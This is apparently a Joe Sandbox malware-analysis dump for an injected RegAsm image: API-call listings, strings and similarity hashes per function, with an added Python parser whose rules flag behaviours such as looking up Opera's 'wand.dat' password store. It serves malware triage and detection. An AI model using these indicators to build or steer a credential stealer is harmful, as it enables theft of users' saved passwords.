                          • API ID: HandleModule$ClassCreateRegisterWindow
                          • String ID:
                          • API String ID: 2678498856-0
                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                          APIs
                          • memset.MSVCRT ref: 0040F673
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                          • strlen.MSVCRT ref: 0040F6A2
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
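The blocks above are Joe Sandbox's per-function summaries for the injected RegAsm image: the resolved API calls of each function (calls made inside a callee are marked "Part of subcall function"), the strings it references (joined with "$" in the String ID line), and the opcode and fuzzy hashes used for similarity matching. Two of them are worth pulling out for triage: the function that enumerates "*.*" looking for "wand.dat" (the password store of classic Opera, consistent with the browser-credential signatures listed for this sample), and the function that converts text with WideCharToMultiByte using code page 0000FDE9 (65001, CP_UTF8) and then calls WriteFile. The parser below is added here as an example and is not part of the Joe Sandbox report: it turns blocks in this layout into records and applies a small rule set over the API names and strings. SAMPLE is a constructed excerpt copied from the blocks above, and the labels in RULES are this editor's interpretation of those API sets, not Joe Sandbox signatures.

```python
"""Parse the per-function summaries in a Joe Sandbox report (the repeated
APIs / Strings / Memory Dump Source / Similarity blocks) into records and flag
API and string combinations worth triaging first.  Added example code, not part
of the report; SAMPLE is a constructed excerpt in the report's own layout and
the RULES labels are this editor's interpretation of the API sets."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "• memcpy.MSVCRT(?,00000030), ref: 0041D8A6" or "• memset.MSVCRT ref: 004100FB",
# optionally prefixed with "Part of subcall function XXXXXXXX:".
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[^.\s]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$")
# "• String ID: *.*$dat$wand.dat", "• Opcode ID: ..." and similar key/value lines.
KV_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # set when the call sits inside a callee


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    def api_names(self):
        return {a.name for a in self.apis}


def parse_blocks(text):
    # Each block starts at a bare "APIs" line; everything up to the next one
    # belongs to that function.  Joe Sandbox joins the strings with "$".
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = KV_RE.match(line)
        if m and m["key"] == "String ID":
            cur.strings = [s for s in m["val"].split("$") if s]
        elif m:
            cur.meta[m["key"]] = m["val"]
    return records


def multibyte_codepages(record):
    # First argument of each WideCharToMultiByte call as an int: 0xFDE9 (65001)
    # is CP_UTF8 and 0 is CP_ACP.  Unresolved "?" arguments are skipped.
    return {int(c.args[0], 16) for c in record.apis
            if c.name == "WideCharToMultiByte" and c.args and c.args[0] != "?"}


# (label, APIs that must all be present, string fragments that must all be present)
RULES = [
    ("opera_wand_dat_lookup", set(), {"wand.dat"}),
    ("ini_settings_persistence",
     {"WritePrivateProfileStringW", "GetPrivateProfileStringW"}, set()),
    ("wide_to_multibyte_then_writefile", {"WideCharToMultiByte", "WriteFile"}, set()),
]


def flag(record):
    names, joined = record.api_names(), "$".join(record.strings)
    return [label for label, apis, frags in RULES
            if apis <= names and all(f in joined for f in frags)]


# Constructed excerpt: two blocks copied in the report's layout.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
Strings
• Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
• String ID:
• API String ID: 2754987064-0
"""
```

Run over a saved copy of the full function listing, the same parser finds every function in the dump that touches a given API pair or string without scrolling the report; extend RULES with the API combinations relevant to the case at hand (for instance the GetMenuStringW/GetKeyState pair or the "%2.2X " hex formatter seen further down this listing).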
                          APIs
                          • memset.MSVCRT ref: 0040F6E2
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                          • strlen.MSVCRT ref: 0040F70D
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscpy$CloseHandle
                          • String ID: General
                          • API String ID: 3722638380-26480598
                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                          APIs
                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                          • GetStockObject.GDI32(00000000), ref: 004143C6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                          • String ID:
                          • API String ID: 764393265-0
                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Time$System$File$LocalSpecific
                          • String ID:
                          • API String ID: 979780441-0
                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                          APIs
                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$DialogHandleModuleParam
                          • String ID:
                          • API String ID: 1386444988-0
                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                          APIs
                          • wcschr.MSVCRT ref: 0040F79E
                          • wcschr.MSVCRT ref: 0040F7AC
                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcschr$memcpywcslen
                          • String ID: "
                          • API String ID: 1983396471-123907689
                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                          APIs
                          • _snwprintf.MSVCRT ref: 0040A398
                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _snwprintfmemcpy
                          • String ID: %2.2X
                          • API String ID: 2789212964-323797159
                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                          APIs
                          • memset.MSVCRT ref: 0040E770
                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: MessageSendmemset
                          • String ID: F^@
                          • API String ID: 568519121-3652327722
                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PlacementWindowmemset
                          • String ID: WinPos
                          • API String ID: 4036792311-2823255486
                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                          • DeleteObject.GDI32(00000000), ref: 004125E7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@DeleteObject
                          • String ID: r!A
                          • API String ID: 1103273653-628097481
                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                          • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                          APIs
                          • wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                          • free.MSVCRT ref: 0040A908
                          • free.MSVCRT ref: 0040A92B
                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 726966127-0
                          • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                          • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                          APIs
                          • wcslen.MSVCRT ref: 0040B1DE
                          • free.MSVCRT ref: 0040B201
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                          • free.MSVCRT ref: 0040B224
                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 726966127-0
                          • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                          • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                          APIs
                          • strlen.MSVCRT ref: 0040B0D8
                          • free.MSVCRT ref: 0040B0FB
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                          • free.MSVCRT ref: 0040B12C
                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$memcpy$mallocstrlen
                          • String ID:
                          • API String ID: 3669619086-0
                          • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                          • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                          • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                          • malloc.MSVCRT ref: 00417407
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                          • free.MSVCRT ref: 00417425
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$freemalloc
                          • String ID:
                          • API String ID: 2605342592-0
                          • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                          • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5